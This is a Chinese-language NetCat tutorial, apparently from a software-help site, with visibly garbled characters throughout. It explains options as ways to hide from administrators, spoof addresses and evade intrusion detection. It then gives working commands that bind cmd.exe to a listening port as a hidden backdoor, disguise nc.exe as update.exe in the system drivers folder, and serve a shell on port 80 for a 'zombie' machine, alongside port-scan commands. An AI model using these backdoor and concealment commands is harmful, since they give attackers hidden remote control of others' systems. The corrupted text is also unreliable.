在入侵中它是最經典的工具之一 ��,NetCat被所有的網絡安全愛好者和研究者稱之為瑞士軍刀����,通過名字大家就能知道他的功能足夠豐富����。
nc的全稱為NetCat,它能夠建立并接受傳輸控制協(xié)議(TCP)和用戶數(shù)據(jù)報協(xié)議(UDP)的連接�����,Netcat可在這些連接上讀寫數(shù)據(jù)���,直到連接關閉為止�����。它可以通過手工或者腳本與應用層的網絡應用程序或服務進行交互��。從技術上來講����,NetCat并不能產生UDP連接,因為UDP是一種無連接的協(xié)議�����。NetCat沒有圖形界面�����,很粗糙���,很原始��。
nc可以通過很多途徑下載得到���,unix和Winodws平臺下的官方站點是:http://www.atsake.com/research/tools/network_utilities.
nc的命令行
nc的基本命令行形式是 nc [options] host ports,其中host是要掃描的主機名或IP地址,ports要么是一個單獨的端口�,要么是一個端口范圍(用m-n的形式指定),要么是一系列用空格隔開的單個端口。
-d? 只對Windows操作系統(tǒng)有用���,該選項使NetCat以隱蔽模式工作����,從而脫離MS-DOS命令提示符下環(huán)境運行�,使得nc不需要保持打開命令窗口便可在監(jiān)聽模式下運行,也可以幫助黑客很好地隱藏監(jiān)聽NetCat實例而不被系統(tǒng)管理員發(fā)現(xiàn)�。
-e 如果NetCat使用gaping_security_hole選項進行編譯,那么只要某人在NET后臺所監(jiān)聽的任何端口上建立連接�,該NetCat都將執(zhí)行,且客戶端的NetCat會通過管道將I/O傳輸?shù)皆趧e處監(jiān)聽的另一個NetCat實例中。使用這個選項非常危險����,除非你對nc相當了解,起碼知道你自己在做什么�。這是在系統(tǒng)中建立后門shell的一個非?���?旖萸胰菀椎姆椒ā?/p>
-i 延時間隔���,表示在兩次數(shù)據(jù)發(fā)送之間nc等待的時間����。例如:當經過管道傳輸一個文件到nc的時候,在傳輸輸入的下一行之前����,nc將等待的秒數(shù)。當使用nc對一臺主機的多個端口之間進行操作時���,在切換到下一個端口之前����,nc等待的秒數(shù)��。這樣可以使黑客在進行數(shù)據(jù)傳輸或對一個服務進行攻擊的時候更加隱蔽��,也可以幫助你的端口掃描不被入侵檢測系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)��。
-g這個選項具有欺騙性����。nc支持loose source routing(松散源路由)。你可以在命令行中指定多達8個-g選項來強迫nc流量經過特定的IP地址����,這在你為流量設置偽造的源IP地址時����,可以利用這個方法達到通過防火墻的過濾器或者允許訪問主機列表����,希望接收到從主機返回的響應。
-G該選項讓用戶在-g選項所指定的路由列表中指定的一個地址作為當前的下一路由�,由于IP地址為4字節(jié)大小(IPV4)���,所以這個參數(shù)總是4字節(jié)的倍數(shù)�����;例如�,4代表路由表中的第一個IP地址��,8代表第二個IP地址����,依次類推��。這在偽造部分源路由表使得報文看起來相當?shù)挠杏?���。在進行欺騙和源路由時�,這個功能有助于屏蔽你的位置�����,但也不一定能接收到響應報文�����,因為響應報文將經過由偽造的IP地址反路由回來���。
-l 該選項切換nc的監(jiān)聽模式���。此選項必須與-p選項一起使用以告訴nc綁定某個指定的TCP端口并等待到來的連接。若換成-u選項���,則應使用UDP端口而非TCP端口�����。
-L 該選項在Windows版本中有用���,當一個連接被關閉后�,使用相同的命令行選項進行重啟監(jiān)聽模式�����,即使此時初始的連接已經結束���,nc也能在不需要用戶干涉的情況下接收后面新的連接�����。與-l一樣�����,必須與-p同時使用����。
-n 該選項告訴我們nc不做任何主機名查找的工作��。
-0 對數(shù)據(jù)執(zhí)行一次十六進制轉儲(hex dump )并將其存儲在hexfile中�����。命令nc-o hexfile將把雙向通信的數(shù)據(jù)記錄下來����,在每行的開始處會有一個"<"或">"用來分別指示是進入數(shù)據(jù)還是外出數(shù)據(jù)。如果只想得到對進入數(shù)據(jù)的十六進制轉儲�����,可以使用 nc -o數(shù)據(jù)的十六進制轉儲���,則可以使用NC -o>hexfile命令�。
-p
讓用戶指定一個nc應使用的本地端口號���。當通過-l或-L選項來使用監(jiān)聽模式的時候��,這個參數(shù)是必需的�����。如果沒有為外出連接指定這個參數(shù)�����,則與大多數(shù)其他TCP或UDP客戶程序的做法一樣�����,nc將使用系統(tǒng)分配給他的任何端口���。
-r 該參數(shù)使nc可以隨機選擇本地和遠程端口�����。當使用nc在系統(tǒng)中范圍很大的一批端口上獲取信息時����,要想混合源端口和目標端口的順序看起來不怎么象端口掃描��,這個選項是很有用的�。當這個選項與-i選項和一個足夠大的間隔結合使用的時候,在不被注意的端口掃描成功幾率能得到很大提升�����。
-s 指定nc建立連接時所使用的IP地址��,該選項允許黑客做一些工作�,它允許黑客隱藏他們的IP地址或假冒他人的IP地址,但是要得到路由到他們所欺騙的地址的任何信息�����,都需要使用-g源路由選項。其次�����,當處于監(jiān)聽模式時�,大多數(shù)情況下都可以與一個已經監(jiān)聽的服務"預先綁定"���,所有TCP和UDP服務都綁定到某個端口���。
-t 如果使用telnet選項編譯,nc就可以與telnet服務器進行telnet選項協(xié)商����,雖然它的響應是毫無意義的信息,但可以通過該狀態(tài)看到連接23端口的信息���。
-u nc使用UDP而非TCP����,在客戶模式和監(jiān)聽模式下都起作用�。
-v 控制nc將要做的事情達到的程度,如使用nc -v�����,那么nc將僅吐出它所接收到的數(shù)據(jù),一個單獨的-v可以知道它連接或綁定的地址是否有問題發(fā)生��,第2個-v可以讓nc在一個連接結束的時候讓你知道這個連接總共發(fā)送和接收了多少數(shù)據(jù)���。
-w 控制在一個連接上nc放棄之前等待的時間����。同時也告訴nc當在標準輸入上接收到一個eof(end-of-file)之后應該等待多長時間來關閉連接并退出�。如果你通過nc向遠程服務器發(fā)送命令并且期望大量的數(shù)據(jù)返回(例如:向一臺web服務器發(fā)送一個http命令以下載一個大文件),該選項是很有用的���。
nc的具體使用
c:\nc.exe -l -p 4455 -d -e cmd.exe 可以很好的隱藏一個NetCat后門�。
c:\nc.exe -p 4455 -d -L -e cmd.exe 這個命令可以讓黑客利用NetCat重新返回系統(tǒng)�,直到系統(tǒng)管理員在任務管理器中看見nc.exe在運行,從而發(fā)現(xiàn)這個后門��,我們一樣可以把它做的更加隱蔽�,
c:\move nc.exe c:\windows\system32\Drivers\update.exe
c:\windows\systeme32\drivers\update.exe -p 4455 -d -L -e cmd.exe
系統(tǒng)管理員可能把特權附屬于一些無害的程序,如update.exe等���,黑客也可以隱藏命令行�。
c:\windows\systme32\drivers\update.exe
cmd line: -l -p 4455 -d -L -e cmd.exe
c:\>
nc -l - p 80? 監(jiān)聽80端口
nc -l -p 80 >c:\log.dat? 監(jiān)聽80端口,并把信息記錄到log.dat中
nc -v -l -p 80? 監(jiān)聽80端口���,并顯示端口信息
nc -vv -l -p 80 監(jiān)聽80端口���,顯示更詳細的端口信息
nc -l -p 80 -t -e cmd.exe監(jiān)聽本地的80端口的入站信息,同時將cmd.exe重定向到80端口�,當有人連接的時候���,就讓cmd.exe以telnet的形式應答����。當然這個最好用在控制的肉雞上�����。
nc -v ip port 掃瞄某IP的某個端口
nc -v -z ip port-port掃描某IP的端口到某端口
nc -v -z -u ip? port-port掃描某IP的某UDP端口到某UDP端口
關鍵詞標簽:nc,網絡安全,瑞士軍刀
火絨安全軟件開啟懸浮窗的方法-怎么限制和設置軟件網速
火絨安全軟件怎么攔截廣告-火絨設置廣告攔截的方法
網絡安全管理軟件-PCHunter使用教程